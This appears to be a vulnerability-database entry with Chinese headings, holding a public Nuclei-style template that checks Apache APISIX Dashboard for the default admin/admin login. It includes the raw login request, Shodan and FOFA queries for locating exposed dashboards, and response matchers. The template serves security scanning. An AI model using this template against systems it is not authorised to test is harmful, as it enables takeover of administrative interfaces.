漏洞描述
An Apache Apisix default admin login was discovered.
apisix-default-login: Apache Apisix Admin - Default Login
PoC代码[已公开]
id: apisix-default-login
info:
name: Apache Apisix Admin - Default Login
author: pdteam
severity: high
description: An Apache Apisix default admin login was discovered.
reference:
- https://apisix.apache.org/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
max-request: 1
product: https://apisix.apache.org
shodan-query: title:"Apache APISIX Dashboard"
fofa-query: title="Apache APISIX Dashboard"
tags: apisix,apache,default-login,vuln
http:
- raw:
- |
POST /apisix/admin/user/login HTTP/1.1
Host: {{Hostname}}
Accept: application/json
Authorization:
Content-Type: application/json;charset=UTF-8
{"username":"{{user}}","password":"{{pass}}"}
attack: pitchfork
payloads:
user:
- admin
pass:
- admin
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"data":'
- '"token":'
- '{"code":0'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4a0a004730450220340bd8278045fc1300997e09f4dae5f0cf2f77bd2ce365b817f87af42bfa025c022100bf555defe45aaac1050d3e39db0cfcfde6130427d8b9e55e3c175bd5319cf97a:922c64590222798bb761d5b6d8e72950